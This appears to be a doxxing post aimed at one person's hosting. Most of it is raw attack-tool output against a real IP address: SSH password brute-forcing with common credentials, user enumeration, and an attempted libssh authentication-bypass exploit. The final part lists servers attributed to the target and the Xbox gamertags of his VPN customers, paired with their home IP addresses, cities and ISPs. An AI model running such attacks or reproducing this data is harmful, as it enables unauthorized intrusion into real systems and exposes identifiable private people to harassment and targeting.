[ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:babygirl NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:babygirl NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:babygirl NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:babygirl NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:babygirl NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:babygirl NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:babygirl NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:babygirl NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:qwerty NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:qwerty NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:qwerty NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:qwerty NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:qwerty NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:qwerty NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:qwerty NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:qwerty NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:qwerty NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:qwerty NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:lovely NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:lovely NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:lovely NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:lovely NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:lovely NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:lovely NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:lovely NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:lovely NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:lovely NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:lovely NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:654321 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:654321 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:654321 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:654321 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:654321 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:654321 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:654321 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:654321 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: web:654321 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: test:654321 NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: root:michael NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: admin:michael NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: administrator:michael NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: webadmin:michael NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: sysadmin:michael NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: netadmin:michael NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: guest:michael NSE: [ssh-brute 142.44.219.227:22] Trying username/password pair: user:michael Completed NSE at 21:53, 91.08s elapsed Initiating NSE at 21:53 Completed NSE at 21:53, 0.05s elapsed Nmap scan report for ip227.ip-142-44-219.net (142.44.219.227) Host is up (0.23s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-auth-methods: | Supported authentication methods: | publickey | gssapi-keyex | gssapi-with-mic |_ password | ssh-hostkey: | 2048 cb:db:17:db:fb:75:df:a1:65:eb:95:c8:0b:30:86:ce (RSA) | ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCsAtaWiKaTYpUdnMOg/Tj4PY7Hp8O74XhsRVOyu8GcSwt8j+9DUCRr+QgzW2vu/C3jSBJquC+o4/WmYXW0CzoHWpEraNOTvoIeqsR+7A1bwHH2aQkg8SjFC/7x2S1NzMdei/k0FtpI9UmQbGgc5cyxIvMfyk822/g2wo2OYZSTQjwce9HzehRUh3UUqIendRk3ilVyA+6UWL889YsFzGtszACUtgC5r+GYshXn8dW10Rlx6b/WRcFQH73DJDVPGO7Z3x/ifNmPLz4jaUL/DuOu5KDoesUX5pvxz+Xp5IU+dIyLmdlytTliEF+liKdun67eBT9DlNB3id4CErB1nMxt | 256 e5:c2:4b:31:82:9a:db:89:71:53:44:1a:64:d2:23:10 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBGftqIMESIrmtau/0SuBlCD133nDvGeo/Qk9tmjUPRRXM5rCAdOmfw4GTieQ066+d1ziYy7P0qpAiSYs2mkjAHQ= | 256 fe:ff:34:66:38:cd:ad:fb:7a:d0:2d:b0:5a:ef:b4:d1 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIEzlcUs0t5ud0X4tHDSh17v5OIiQlSdiO1dj+MfJHXfW | ssh-publickey-acceptance: |_ Accepted Public Keys: No public keys accepted |_ssh-run: Failed to specify credentials and command to run. | vulners: | cpe:/a:openbsd:openssh:7.4: | CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778 | CVE-2020-15778 6.8 https://vulners.com/cve/CVE-2020-15778 | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919 | CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919 | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906 | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906 | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 | CVE-2020-14145 4.3 https://vulners.com/cve/CVE-2020-14145 |_ CVE-2014-9278 4.0 https://vulners.com/cve/CVE-2014-9278 Device type: general purpose Running: Linux 3.X|4.X OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 OS details: Linux 3.2 - 4.9 Uptime guess: 10.214 days (since Sun Aug 30 16:44:42 2020) Network Distance: 12 hops IP ID Sequence Generation: All zeros TRACEROUTE (using port 22/tcp) HOP RTT ADDRESS 1 0.17 ms _gateway (139.99.61.1) 2 0.16 ms 192.168.143.254 3 0.22 ms 10.29.218.62 4 0.20 ms 10.29.211.136 5 0.43 ms 10.133.2.26 6 0.21 ms 10.75.0.12 7 0.25 ms 10.95.210.1 8 ... 9 231.47 ms 10.95.82.0 10 232.80 ms 10.74.8.113 11 225.81 ms 10.34.66.57 12 223.25 ms ip227.ip-142-44-219.net (142.44.219.227) NSE: Script Post-scanning. Initiating NSE at 21:53 Completed NSE at 21:53, 0.00s elapsed Initiating NSE at 21:53 Completed NSE at 21:53, 0.00s elapsed Read data files from: /usr/bin/../share/nmap OS and Service detection performed. Nmap done: 1 IP address (1 host up) scanned in 97.94 seconds Raw packets sent: 45 (3.642KB) | Rcvd: 56 (3.262KB) ====================================================================================•x[2020-09-09](21:53)x• RUNNING SSH VERSION SCANNER ====================================================================================•x[2020-09-09](21:53)x• USER_FILE => /usr/share/brutex/wordlists/simple-users.txt RHOSTS => 142.44.219.227 RHOST => 142.44.219.227 [+] 142.44.219.227:22 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.4 service.protocol=ssh fingerprint_db=ssh.banner ) [*] 142.44.219.227:22 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ====================================================================================•x[2020-09-09](21:53)x• RUNNING OPENSSH USER ENUM SCANNER ====================================================================================•x[2020-09-09](21:53)x• USER_FILE => /usr/share/brutex/wordlists/simple-users.txt RHOSTS => 142.44.219.227 RHOST => 142.44.219.227 [*] 142.44.219.227:22 - SSH - Using malformed packet technique [*] 142.44.219.227:22 - SSH - Starting scan [+] 142.44.219.227:22 - SSH - User 'admin' found [+] 142.44.219.227:22 - SSH - User 'administrator' found [+] 142.44.219.227:22 - SSH - User 'anonymous' found [+] 142.44.219.227:22 - SSH - User 'backup' found [+] 142.44.219.227:22 - SSH - User 'bee' found [+] 142.44.219.227:22 - SSH - User 'ftp' found [+] 142.44.219.227:22 - SSH - User 'guest' found [+] 142.44.219.227:22 - SSH - User 'GUEST' found [+] 142.44.219.227:22 - SSH - User 'info' found [+] 142.44.219.227:22 - SSH - User 'mail' found [+] 142.44.219.227:22 - SSH - User 'mailadmin' found [+] 142.44.219.227:22 - SSH - User 'msfadmin' found [+] 142.44.219.227:22 - SSH - User 'mysql' found [+] 142.44.219.227:22 - SSH - User 'nobody' found [+] 142.44.219.227:22 - SSH - User 'oracle' found [+] 142.44.219.227:22 - SSH - User 'owaspbwa' found [+] 142.44.219.227:22 - SSH - User 'postfix' found [+] 142.44.219.227:22 - SSH - User 'postgres' found [+] 142.44.219.227:22 - SSH - User 'private' found [+] 142.44.219.227:22 - SSH - User 'proftpd' found [+] 142.44.219.227:22 - SSH - User 'public' found [+] 142.44.219.227:22 - SSH - User 'root' found [+] 142.44.219.227:22 - SSH - User 'superadmin' found [+] 142.44.219.227:22 - SSH - User 'support' found [+] 142.44.219.227:22 - SSH - User 'sys' found [+] 142.44.219.227:22 - SSH - User 'system' found [+] 142.44.219.227:22 - SSH - User 'systemadmin' found [+] 142.44.219.227:22 - SSH - User 'systemadministrator' found [+] 142.44.219.227:22 - SSH - User 'test' found [+] 142.44.219.227:22 - SSH - User 'tomcat' found [+] 142.44.219.227:22 - SSH - User 'user' found [+] 142.44.219.227:22 - SSH - User 'webmaster' found [+] 142.44.219.227:22 - SSH - User 'www-data' found [+] 142.44.219.227:22 - SSH - User 'Fortimanager_Access' found [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed ====================================================================================•x[2020-09-09](21:54)x• RUNNING LIBSSH AUTH BYPASS EXPLOIT CVE-2018-10933 ====================================================================================•x[2020-09-09](21:54)x• RHOSTS => 142.44.219.227 RHOST => 142.44.219.227 LHOST => 127.0.0.1 LPORT => 4444 [*] 142.44.219.227:22 - Attempting authentication bypass [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed + -- --=[Port 23 closed... skipping. + -- --=[Port 25 closed... skipping. + -- --=[Port 53 closed... skipping. + -- --=[Port 67 closed... skipping. + -- --=[Port 68 closed... skipping. + -- --=[Port 69 closed... skipping. + -- --=[Port 79 closed... skipping. + -- --=[Port 80 closed... skipping. + -- --=[Port 110 closed... skipping. + -- --=[Port 111 closed... skipping. + -- --=[Port 123 closed... skipping. + -- --=[Port 135 closed... skipping. + -- --=[Port 137 closed... skipping. + -- --=[Port 139 closed... skipping. + -- --=[Port 161 closed... skipping. + -- --=[Port 162 closed... skipping. + -- --=[Port 264 closed... skipping. + -- --=[Port 389 closed... skipping. + -- --=[Port 443 closed... skipping. + -- --=[Port 445 closed... skipping. + -- --=[Port 500 closed... skipping. + -- --=[Port 512 closed... skipping. + -- --=[Port 513 closed... skipping. + -- --=[Port 514 closed... skipping. + -- --=[Port 1099 closed... skipping. + -- --=[Port 1433 closed... skipping. + -- --=[Port 2049 closed... skipping. + -- --=[Port 2181 closed... skipping. + -- --=[Port 3306 closed... skipping. + -- --=[Port 3310 closed... skipping. + -- --=[Port 3128 closed... skipping. + -- --=[Port 3389 closed... skipping. + -- --=[Port 3632 closed... skipping. + -- --=[Port 5432 closed... skipping. + -- --=[Port 5555 closed... skipping. + -- --=[Port 5800 closed... skipping. + -- --=[Port 5900 closed... skipping. + -- --=[Port 5984 closed... skipping. + -- --=[Port 6000 closed... skipping. + -- --=[Port 6667 closed... skipping. + -- --=[Port 7001 closed... skipping. + -- --=[Port 8000 closed... skipping. + -- --=[Port 8001 closed... skipping. + -- --=[Port 9495 closed... skipping. + -- --=[Port 10000 closed... skipping. + -- --=[Port 16992 closed... skipping. + -- --=[Port 27017 closed... skipping. + -- --=[Port 27018 closed... skipping. + -- --=[Port 27019 closed... skipping. + -- --=[Port 28017 closed... skipping. + -- --=[Port 49180 closed... skipping. ====================================================================================•x[2020-09-09](21:54)x• SKIPPING FULL NMAP PORT SCAN ====================================================================================•x[2020-09-09](21:54)x• •?((¯°·..• Sc0pe Vulnerability Report by @xer0dayz •._.·°¯))؟• ==================================================================================== Critical: 0 High: 0 Medium: 0 Low: 0 Info: 0 Score: 0 ====================================================================================•x[2020-09-09](21:54)x• SCAN COMPLETE! How his website is currently set up https://imgur.com/a/yELskUd He uses very bad Hosting Practices heres why he uses hosting where it can easily be Accessed into he doesn't host his website on his VPS this is bad practices. ============================================================================================ Servers owned by him: 2020-09-03 02:40:56 142.44.219.227 India Bhopal OVH Hosting 2020-09-02 00:04:51 142.44.219.231 India Bhopal OVH Hosting 2020-08-22 02:58:23 51.89.210.22 Germany Frankfurt am Main OVH SAS 2020-07-28 22:45:50 74.91.119.40 United States Chicago (Central) Nuclearfallout Enterprises, Inc. 2020-07-26 19:48:03 51.68.200.196 Italy Rome OVH SAS 2020-07-26 19:36:57 51.89.210.20 Germany Frankfurt am Main OVH SAS 2020-07-17 06:10:06 162.248.93.97 United States Los Angeles (Downtown) Nuclearfallout Enterprises, Inc. 2020-06-22 07:38:18 51.89.211.122 Spain Madrid OVH SAS 2020-07-22 12:50:23 51.89.178.240 United Kingdom Moffat OVH SAS 2020-08-19 22:46:35 139.99.180.9 Australia North Sydney OVH Australia PTY LTD ============================================================================================ Current & Old Customers on Softeither/Openvpn XBOX Gamertags: DX Daedric Kayozo H7z Prints Home IP: 73.99.13.88 United States Pulaski Comcast Cable Communications POMC Horrified POMC Rey POMC Abattoir Home IP: 114.198.18.52 Australia Sydney TPG Internet Pty Ltd Savasis GTMC Honour NrthEnds Home IP: 27.32.239.104 Australia Melbourne TPG Internet Pty Ltd apexDRIZZYMP Home IP: 27.32.239.104 Australia Melbourne TPG Internet Pty Ltd POMC Horror Home IP: 1.159.34.125 Australia Melbourne Telstra Corporation Durcea BALLA OG ASILO Not zTko Pryina OIynykk Bupeh Boxed2k TTV xNutil Oluzy Vriyn Home Ports Im Zuplex Caservo OIynyk